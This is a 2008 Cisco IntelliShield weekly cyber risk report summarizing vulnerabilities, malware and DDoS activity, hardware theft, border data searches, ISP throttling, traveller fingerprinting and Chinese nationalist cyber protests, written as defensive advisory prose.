April 21–27, 2008The IntelliShield Cyber Risk Report is a strategic intelligence product that highlights current security activity and mid- to long-range perspectives. The report addresses seven major risk management categories: vulnerability, physical, legal, trust, identity, human, and geopolitical. The Cyber Risk Reports are a result of collaborative efforts, information sharing, and collective security expertise of senior analysts from Cisco security services that include the IntelliShield team (IntelliShield Alert Manager, Applied Intelligence, and IPS), ROS, PSIRT, the Corporate Security Programs Organization, and Legal Support. VulnerabilityThe previous time period was highlighted by numerous third-party Linux and UNIX vendors releasing updated packages to address vulnerabilities in other vendor's products. Packages included updates for both IBM and Sun's implementation of Java, Mozilla-based browsers, ClamAV antivirus software, PostgreSQL, and MySQL. A coding error allowed an attacker to redirect users of United States (U.S.) presidential candidate Barack Obama's official website to the website of his opponent, Hillary Clinton. According to reports, the coding flaw existed in the Community Blogs section of the website, allowing the attacker to use a script insertion or cross-site scripting attack to redirect users. Although the attack was benign in nature, the same flaw could have been used to deliver malicious code to any user visiting the affected portions of the site. In a separate and more malicious incident, reports indicate that over 500,000 websites were compromised using an SQL injection vulnerability. Users visiting any one of the affected websites were redirected to another website that was hosting malicious code. In this manner, the attacker could compromise a user's system. There are many available products that allow website maintainers to implement interactive activities, such as blogging and social networking, on websites as well as products that require the use of a backend database. Many of these products have latent vulnerabilities that could put users at risk. Maintainers of these websites should strive to keep their patch levels current and stay up-to-date of any existing unpatched vulnerabilities. Additionally, maintainers should consider using software that monitors websites and records and reports when pages have been modified. As always users should exercise caution when visiting untrustworthy websites. In malicious code activity, the Kraken botnet has issued an update to the bot installed on its infected hosts. The update consists of a new command and control mechanism that may make the detection process more difficult. Reports state that the trojan may also be communicating over random ports and using random packet payload lengths in the new command and control communication. The trojan may also be using HTTP via TCP ports 80 and 443 to send and receive encrypted traffic. Information regarding the Kraken botnet is available in IntelliShield Alert 7076. In other malicious code activity, FDoS-RedFlag is responsible for performing a distributed denial of service (DDoS) attack against Cable News Network (CNN). The DDoS attack is being conducted by several activists, including HackCNN. This trojan appears to originate from a source in China. The trojan is documented in IntelliShield Alert 15731. Malcode authors continue to take advantage of the upcoming Olympics in Beijing. Reports indicate that there have been 13 unique Olympic-themed attacks. Thus far, attackers are using e-mail as the attack vector. The e-mail may appear to be legitimate, but may contain malicious software. Users are advised to be cautious when viewing and opening e-mails and e-mail attachments. As always, administrators are advised to block all file attachments except those specifically required for business purposes. IntelliShield published 183 events last week: 27 new events and 156 updated events. Of the 183 events, 156 were Vulnerability Alerts, 10 were Security Issue Alerts, five were Security Activity Bulletins, four were Daily Malicious Code Summaries, four were Malicious Code Alerts, three were Applied Mitigation Vulnerabilities, and one was a Cyber Risk Report. The alert publication totals are as follows: Weekly Alert Totals
Previous Alerts That Still Represent Significant RiskOracle Critical Patch Update April 2008 Oracle has released the Critical Patch Update advisory for April 2008. This update addresses a total of 41 vulnerabilities in Oracle products affecting Oracle Database products, Oracle Application Server, Oracle Collaboration Suite, Oracle E-Business Suite, Oracle PeopleSoft Enterprise, and Oracle Siebel Enterprise products. Additional IntelliShield alerts that detail individual vulnerabilities will be released in the near future as technical details become available. Microsoft Windows GDI File Name Parameter Vulnerability Microsoft Windows contains a vulnerability that could allow a remote attacker to execute arbitrary code with the privileges of the user. This vulnerability is currently being exploited in the wild by Trojan.Emifie, which is documented in IntelliShield Alert 15642. Microsoft has confirmed the vulnerability in a security bulletin and released software updates. CA BrightStor ARCserve Backup ListCtrl ActiveX Control AddColumn() Buffer Overflow Vulnerability Multiple CA products contain a buffer overflow vulnerability that could allow a remote attacker to cause a denial of service condition or execute arbitrary code. Exploit code that allows for the execution of arbitrary code is available. Reports indicate that attackers are actively exploiting this vulnerability. To exploit this vulnerability, an attacker must rely on user interaction. An attacker may employ social engineering tactics to convince a user to visit a malicious website by using a browser, such as Internet Explorer, that supports ActiveX controls. CA confirmed the vulnerability in a security response, but updates are not available. Microsoft Jet Database Engine Buffer Overflow Vulnerability Microsoft Jet Database Engine contains a vulnerability that could allow a remote attacker to execute arbitrary code on the affected system. This vulnerability is currently being exploited by malicious software. The vulnerability has been identified as being used by TROJ_MSJET.C, which is documented in IntelliShield Alert 15486, and Trojan.Acdropper.C, as described in IntelliShield Alert 10679. Microsoft has confirmed the vulnerability but software updates are unavailable. Apple Security Update 2008-002 Multiple Mac OS X and OS X Server Vulnerabilities Apple has released Security Update 2008-002 to address multiple vulnerabilities in Mac OS X and Mac OS X Server. This update addresses vulnerabilities that could allow an attacker to cause a DoS condition or execute arbitrary code with elevated privileges. The update corrects flaws within core operating system components as well as third-party packages that are bundled with the operating system. Microsoft Windows Vista DHCP Request Processing Denial of Service Vulnerability Microsoft Windows Vista and Microsoft Windows Vista x64 Edition contain a vulnerability that could allow a remote attacker to cause a DoS condition. Event data from Cisco Remote Management Services has detected intrusion prevention system signature activity related to this vulnerability. The data, which was captured on March 13, 2008, could indicate exploit attempts. Microsoft confirmed this vulnerability in a security bulletin and released software updates. Linux Kernel vmsplice Invalid Memory Pointer Dereference Vulnerability The Linux Kernel contains a vulnerability that could allow a local attacker to gain superuser privileges. The attacker could leverage these privileges to take complete control of the vulnerable system. Exploit code demonstrating the privilege escalation vulnerability is publicly available. Reports indicate that this vulnerability is being actively exploited. Linux Kernel get_iovec_page_array() Privilege Escalation Vulnerability The Linux Kernel contains a vulnerability that could allow a local attacker to gain privileges equal to the superuser account. The attacker could leverage these privileges to take complete control of the vulnerable system. Exploit code is available. Reports indicate that attackers are actively exploiting this vulnerability to compromise affected systems. Adobe Reader and Acrobat Security Update 8.1.2 Adobe has released updates for Adobe Reader and Acrobat on the Mac OS X, Linux, Solaris, UNIX, and Windows platforms. The update corrects several unspecified vulnerabilities in versions of the affected applications prior to 8.1.2. Independent security researchers have released the technical details of several vulnerabilities corrected by this update. At least one has been used to distribute malicious code. PhysicalStolen Hardware Top Cause of Security BreachesThe recently released Microsoft Security Intelligence Report for July-December 2007 included statistics of security breach notifications that showed stolen equipment as the top reason for notifications. Lost equipment was the third leading reason for incidents. Related reports cite the theft of a server from the Central Collection Bureau in the state of Indiana that contains customer billing records for 100 businesses and 700,000 identities and a laptop from the State University of New York that contains 17,500 student application records. Additionally, Kensington security firm reported a survey of the Infosec Europe 2008 exhibit floor citing that only 61 of 315 laptops secured at the booths. IntelliShield Analysis: The Microsoft report and continued incident reports clarify an important risk and shift in criminal activity. While vulnerabilities, attacks, and security defenses continue to escalate in complexity, criminals have shifted to the simpler physical vulnerability to compromise valuable data and identity information. Nearly all information systems have physical and logical security measures built-in or available, but many are never used, addressed in security policies, included in user security training, or reinforced. With the continued reports of these incidents and their related costs, coordinated efforts are required by information and physical security teams to enforce and reinforce the simple and existing security features and practices, with near zero cost, which will mitigate this top-ranked incident risk. Managers and security teams should perform a regular walk-through of their offices, parking lots, and grounds to survey systems that are easy targets and reinforce the security risks to their users. LegalData Seizures at U.S. BordersThe United States (U.S.) Court of Appeals for the Ninth Circuit has ruled that laptops and storage devices are personal property and thus eligible to having applied the border search exception. The court also ruled that determined US border officials were justified in conducting a warrantless search. (Note that in February 2008, two civil liberty groups filed lawsuits against U.S. Customs and Border Protection.) This ruling highlights the challenges of protecting personal and proprietary data when traveling across borders, as the government on each side may express an interest in inspecting the data. Read more (PDF) IntelliShield Analysis: This case serves to remind all international travelers, regardless of nationality, of the possibility of lawful search occurring as they enter, exit, and transit the border zone of any country, including the U.S. Companies with international travelers may consider reviewing their information handling policies to ensure appropriate guidance is in place in the event data is exposed or confiscated during a lawful search. Similarly, companies may also consider providing guidance in how to cooperate during a search as well as understand internal reporting procedures subsequent to a search. Travelers who may be subject to a perceived or real violation of non-disclosure agreements or confidentiality clauses if their data is exposed during a lawful search may consider options that obviate the need to transit border zones with laptops that contain such data. TrustISPs Biased Against Certain Types of TrafficThe Federal Communications Commission (FCC) of the United States (U.S.) is once again investigating Comcast, one of the largest Internet Service Providers (ISPs) in the U.S. New allegations have surfaced citing that the company's previous testimony to both the U.S. Congress and the FCC concerning its network management practices may not have been completely accurate. The evidence being presented claims that Comcast deliberately throttled the bandwidth of its customers even during periods of low network utilization. The ongoing investigation has prompted calls by customers and industry leaders from several countries asking local governmental agencies to put regional service providers under the same level of scrutiny that is currently being applied to Comcast. IntelliShield Analysis: Many customers believe that the service agreement that they enter into with their ISP grants them unlimited and unfettered use of the provider's network for an agreed upon monthly fee. To this end, both customers and service providers are seeking clarity on the network management practices of the most prevalent providers of Internet connectivity. While the demands continue for ISPs to simplify the language in service agreements and provide total transparency detailing traffic shaping and bandwidth throttling of customer connections, government agencies are struggling to determine how or if they should intervene. It is likely that most ISPs, which have historically strived to be self-regulated, will make efforts to answer these types of questions before being forced to comply with governmental regulation. IdentityAirlines Being Asked to Fingerprint Departing Foreign TravelersIn addition to the already significant amount of data that is collected on foreigners entering the United States (U.S.), the U.S. Department of Homeland Security (DHS) is asking travel companies, including airlines and cruise ship operators, to collect digital fingerprints of all foreigners when leaving the country. This information could be used to ensure that foreigners do not stay in the country beyond the amount of time they have been granted to visit. As airlines work to streamline the boarding process and contend with increased fuel prices, such a plan could prove difficult and costly for the airlines. Read more IntelliShield Analysis: The move to collect digital fingerprints raises privacy issues. As the airline industry contends with numerous costly initiatives, they argue that fingerprint collection should be the responsibility of a U.S. government agency, while DHS is pushing for private sector implementation. Placing the responsibility of this type of data collection with organizations that are opposed to the idea and without a detailed plan for implementation could result in the loss or theft of this information. Unless the program is maintained by those with a vested interest, either in government or private industry, there is a risk that security will be an afterthought. HumanThere was no significant activity in this category during the time period. GeopoliticalChinese Citizens Exhibit National FervorRecent press reports from France and the United States (U.S.) indicate that national fervor in China coupled with technical acumen has resulted in both physical and cyber protests and cyber interruptions for western entities. Cable News Network (CNN) has confirmed that multiple entities engaged in loosely organized cyber distributed denial of service attacks against its network during the period of April 18–21, 2008. These activities organized by groups named CN Magistrate and Hack CNN were expressing their displeasure with CNN's news coverage of the recent unrest in Tibet, as well as perceived derogatory commentary by a CNN commentator. Security analysts characterized the activity as a cyber riot. French supermarket chain, Carrefour, has confirmed that street protests occurred at some of their 122 outlets in China. Separately, China Internet search engine, Baidu, showed over 211,000 entries surrounding steps to organize the physical protest at Carrefour outlets. The protestors, both physical and virtual, were angered by the interruption of the Olympic torch relay in Paris and have accused Carrefour, the most visible sign of France in China, of supporting the exiled government of the Dalai Lama. According to news reports, Chinese censors have quietly warned cyber-police and Internet businesses to delete all information related to protests against Western policies, nations, or companies. IntelliShield Analysis: Companies will continue to find themselves as representative of their national interests, even if they have taken great pains to distance themselves from international diplomatic context. In the aforementioned, Carrefour, has gone to great lengths to separate itself from the French government's actions. Nevertheless, patriotic fervor and nationalism can be expected to continue to escalate to grass-roots protests should perceived insults or criticisms by foreign entities or governments take place. The ability of the Chinese cyber control entities to limit these activities will be tested. Upcoming Security ActivityCSI SX 2008: April 27–May 2, 2008
Additional InformationFor more information about the vulnerabilities contained in this report or the Cisco Security IntelliShield Alert Manager Service, please visit For information on obtaining a free, 30-day trial of the Cisco Security IntelliShield Alert Manager Service, please visit This document is provided on an "as is" basis and does not imply any kind of guarantee or warranty, including the warranties of merchantability or fitness for a particular use. Your use of the information on the document or materials linked from the document is at your own risk. Cisco reserves the right to change or update this document at any time.
|
|||||||||||||||||||||||||||||||||||||
